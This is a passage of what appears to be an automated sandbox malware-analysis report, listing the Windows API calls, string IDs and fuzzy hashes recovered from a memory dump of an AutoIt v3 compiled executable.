                                                                                                                                                                                                                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00771142
                                                                                                                                                                                                                                                                              • IcmpCloseHandle.IPHLPAPI(?), ref: 00771216
                                                                                                                                                                                                                                                                              • WSACleanup.WSOCK32 ref: 0077121C
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                              • String ID: Ping
                                                                                                                                                                                                                                                                              • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                              • Opcode ID: 397752335095d3faa3a95f15ede168a9c43f7340ea7c1b12c3c842d9d44d4a1d
                                                                                                                                                                                                                                                                              • Instruction ID: 9ceb7ad20790c7131f75f571127b99b083e3f870f422ece59387d822f0711815
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 397752335095d3faa3a95f15ede168a9c43f7340ea7c1b12c3c842d9d44d4a1d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79919E316042019FDB20DF19C888F26BBE1BF44358F95C5A9E569CF6A2C739ED85CB81
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID: Variable must be of type 'Object'.$t5|$t5|$t5|$t5|$t5|t5|
                                                                                                                                                                                                                                                                              • API String ID: 0-2942055604
                                                                                                                                                                                                                                                                              • Opcode ID: a84de830c7e768703c59ee69d2a5c131f09586384e3011ac8360506ea95fff21
                                                                                                                                                                                                                                                                              • Instruction ID: 633dfab2bb0c4b41b26c1426a6e129aa3bf64be28311f316a0992ac25cb10655
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a84de830c7e768703c59ee69d2a5c131f09586384e3011ac8360506ea95fff21
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FC27D71A00219DFCB24CF58D884BBDB7F2BF09310F248169EA15AB391D779AD41DB91
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 007015F2
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                              • String ID: t5|$t5|$t5|$t5|$t5|t5|
                                                                                                                                                                                                                                                                              • API String ID: 1385522511-1033926845
                                                                                                                                                                                                                                                                              • Opcode ID: 19452d6965e16e979df55829b56c302b8086853eafeb9e20e476f8570de4e7e0
                                                                                                                                                                                                                                                                              • Instruction ID: b83ec5532db19ed2ef39220710deb112a685a65924f22e6b6bbbbd28d01e1372
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19452d6965e16e979df55829b56c302b8086853eafeb9e20e476f8570de4e7e0
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4B26C74A08341CFDB24CF18C480B6AB7E1BF99324F548A5DE9858B391D779ED81CB92

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006F32AF
                                                                                                                                                                                                                                                                                • Part of subcall function 006F327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 006F32B7
                                                                                                                                                                                                                                                                                • Part of subcall function 006F327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006F32C2
                                                                                                                                                                                                                                                                                • Part of subcall function 006F327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006F32CD
                                                                                                                                                                                                                                                                                • Part of subcall function 006F327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 006F32D5
                                                                                                                                                                                                                                                                                • Part of subcall function 006F327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 006F32DD
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3205: RegisterWindowMessageW.USER32(00000004,?,006F2964), ref: 006F325D
                                                                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006F2A0A
                                                                                                                                                                                                                                                                              • OleInitialize.OLE32 ref: 006F2A28
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 00733A0D
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                              • String ID: (&|$0$|$4'|$d(|$$|
                                                                                                                                                                                                                                                                              • API String ID: 1986988660-3251887934
                                                                                                                                                                                                                                                                              • Opcode ID: d5c133fcbad624d0e442e15160dbf4fcdf7d9e9f04e17b45bcdc0f35e694514a
                                                                                                                                                                                                                                                                              • Instruction ID: 2b508a256fcdcb0923e30d763b35e74bbe8e52b23e50f63daf17ed74f2cb5580
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5c133fcbad624d0e442e15160dbf4fcdf7d9e9f04e17b45bcdc0f35e694514a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71718DB09013458F8398EF69B969E263BE1BB48304750C1AED508C73A3EBBC59538F5C

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 3083f7ff3390128b8cd5b876a80ed5e247f5492d1dc4e0bd9be8e9fcca3f1a7f
                                                                                                                                                                                                                                                                              • Instruction ID: 8fb4391b21fcdff3ca4f708c750d291b9202d7108e2b4e9376fb2af7cb6260b8
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3083f7ff3390128b8cd5b876a80ed5e247f5492d1dc4e0bd9be8e9fcca3f1a7f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DC1C2B0D04269EFDF11EFA8E845BADBBB0AF09310F184159E654A73D2C7389D42CB61

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              control_flow_graph 1777 6f35b3-6f3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006F35E1
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006F3602
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,006F3368,?), ref: 006F3616
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,006F3368,?), ref: 006F361F
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                              • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                              • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                              • Opcode ID: c13ea39f5abb8b53604e812d9d2f9f195960e6a0495b8869d6d7907b50cc31c4
                                                                                                                                                                                                                                                                              • Instruction ID: 1d4d239e787e7ca3ee6ed5d54bf81fa1159ead4f0fa3da4fd5b933af6f4e5f59
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c13ea39f5abb8b53604e812d9d2f9f195960e6a0495b8869d6d7907b50cc31c4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11F0DA716403D47AE73157176C48E372FBDE7C6F50B10802EB904A71A1D66D1C52DBB8

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00735287
                                                                                                                                                                                                                                                                                • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
                                                                                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 006F6299
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                              • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                              • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                              • Opcode ID: 9eadd210b7599835dcf5a4274b90f2e3db6c6064927f523e9bbd8ba41b66855b
                                                                                                                                                                                                                                                                              • Instruction ID: 6bdd1f4ee1e29618db209ec8d60e89ee022b7e380fa4d891ade872a514e75fd5
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9eadd210b7599835dcf5a4274b90f2e3db6c6064927f523e9bbd8ba41b66855b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B41D871408308AED750EB20DC45EEF77EDAF44310F10462EFA95921A2EF789A49C79A

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,OVs,0072894C,?,007B9CE8,0000000C,007289AB,?,OVs,?,0073564F), ref: 00728A84
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00728A8E
                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00728AB9
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                              • String ID: OVs
                                                                                                                                                                                                                                                                              • API String ID: 2583163307-2708130235
                                                                                                                                                                                                                                                                              • Opcode ID: 2bcfdf6080abaa79b07cd65931d756953a28ecc38a950101f804e2fa113be372
                                                                                                                                                                                                                                                                              • Instruction ID: c6b45bb451bf35c5275bc864083dea6b3d4eea5c22c5542d2e68eb8808ec3635
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bcfdf6080abaa79b07cd65931d756953a28ecc38a950101f804e2fa113be372
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD014E32607570AAD6646274BC49B7E67654F82734F39C21EF8148B2D3DF7E8D804292
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,006F58BE,SwapMouseButtons,00000004,?), ref: 006F58EF
                                                                                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,006F58BE,SwapMouseButtons,00000004,?), ref: 006F5910
                                                                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,006F58BE,SwapMouseButtons,00000004,?), ref: 006F5932
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                              • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                              • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                              • Opcode ID: c401431bdf85aa224c2400611052732cd325672188e0f9f2d05fbe936248d7e9
                                                                                                                                                                                                                                                                              • Instruction ID: e7aa7a9ffac7ecd57a87c53b4780e50cdc3ad4b0748ec9574f0ca75121874e17
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c401431bdf85aa224c2400611052732cd325672188e0f9f2d05fbe936248d7e9
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3115775610658FFDB258F64CC81EFEBBBDEF00760B108469EA06E7210E2719E419BA4
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00703006
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                              • String ID: CALL$bnu
                                                                                                                                                                                                                                                                              • API String ID: 1385522511-2059927368
                                                                                                                                                                                                                                                                              • Opcode ID: 6ec9e68d1c25a5eec24ace0509bbc4f1b5f426881c609594b565abfd13f2e2e5
                                                                                                                                                                                                                                                                              • Instruction ID: 740a41fc101012c959ef5927b89ff54fe9068fce3d6846a243cc162d4becfe03
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ec9e68d1c25a5eec24ace0509bbc4f1b5f426881c609594b565abfd13f2e2e5
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99229E71608201DFC714DF14C488A2ABBF5BF88314F148A5DF4968B3A2D779ED82CB92
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 0073413B
                                                                                                                                                                                                                                                                                • Part of subcall function 006F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F55D1,?,?,00734B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F5871
                                                                                                                                                                                                                                                                                • Part of subcall function 006F3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 006F3A76
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                              • String ID: X$`u{
                                                                                                                                                                                                                                                                              • API String ID: 779396738-1012507993
                                                                                                                                                                                                                                                                              • Opcode ID: ceee3d990836c781723ab32e62a49a19bbff812a465b0519d5528bc40f6dc26b
                                                                                                                                                                                                                                                                              • Instruction ID: 153c53e591d6b4b4882237c16736866101cdea5315481986fe63e0b45b9f3ccb
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ceee3d990836c781723ab32e62a49a19bbff812a465b0519d5528bc40f6dc26b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F21C371A0025C9BDB45DF98C805BEE7BF9AF49300F008059E645B7382DBF89A898F65
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007109D8
                                                                                                                                                                                                                                                                                • Part of subcall function 00713614: RaiseException.KERNEL32(?,?,?,007109FA,?,00000000,?,?,?,?,?,?,007109FA,00000000,007B9758,00000000), ref: 00713674
                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007109F5
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                                                                                                                                              • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                              • Opcode ID: e6b724aa6fe4beea7f00e91d0b708aa6e3fdbc5ffd021d1e4b08f7dd7dc691ba
                                                                                                                                                                                                                                                                              • Instruction ID: 40b096c0976677c27643d3cd3a03a26f525caa6a6299e867b2d51d73c4d8fd51
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6b724aa6fe4beea7f00e91d0b708aa6e3fdbc5ffd021d1e4b08f7dd7dc691ba
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFF0687490020DF78B04BAACEC5A9DE777C5E01350B604161BA24965D2FBBCE6D5C6D0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00778D52
                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00778D59
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 00778F3A
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 146820519-0
                                                                                                                                                                                                                                                                              • Opcode ID: 0121c4092938238cf08bd8a70ae582b630417464b27b0e8fe8e020880f3f5ef3
                                                                                                                                                                                                                                                                              • Instruction ID: 12b98f377e404f80d871fcddb08ea91ee770f1d2a5848b8962ea14ebb06ccd59
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0121c4092938238cf08bd8a70ae582b630417464b27b0e8fe8e020880f3f5ef3
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92127C71A08301DFCB50DF24C488B2ABBE1FF84354F14895DE9898B292CB75ED45CB92
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 306214811-0
                                                                                                                                                                                                                                                                              • Opcode ID: 148cd1704fb3293d6704645f80c86ecee72c0ee009be25b789047a26fe089937
                                                                                                                                                                                                                                                                              • Instruction ID: dd183b5dd376c90f89ef60163bfc7e8845812b1bd2ffd6ba46a831e324e93fb0
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 148cd1704fb3293d6704645f80c86ecee72c0ee009be25b789047a26fe089937
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68A14A31604509EFCF18DF18D5D19A9BBA2FF45354B60C4ADE94A8F2A2DB39ED41CB80
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 006F6299
                                                                                                                                                                                                                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 0070FD36
                                                                                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0070FD45
                                                                                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0074FE33
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                              • Opcode ID: 56b0085df9a885ff2287856fd2d6d7d92de40b30f022642370fc98c95fb5d467
                                                                                                                                                                                                                                                                              • Instruction ID: 33133a154d4b984adc6e26ba14af1f8b16e498cb6751c8ede732528a77e8649f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56b0085df9a885ff2287856fd2d6d7d92de40b30f022642370fc98c95fb5d467
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A131A771A04754AFEB32CF24C855BE7BBECAB02308F1044AED6D997282C37C5A85CB55
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,007297BA,FF8BC369,00000000,00000002,00000000), ref: 00729744
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,007297BA,FF8BC369,00000000,00000002,00000000,?,00725ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00716F41), ref: 0072974E
                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00729755
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 006F3A3C
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • IsThemeActive.UXTHEME ref: 006F333D
                                                                                                                                                                                                                                                                                • Part of subcall function 006F32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 006F32FB
                                                                                                                                                                                                                                                                                • Part of subcall function 006F32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006F3312
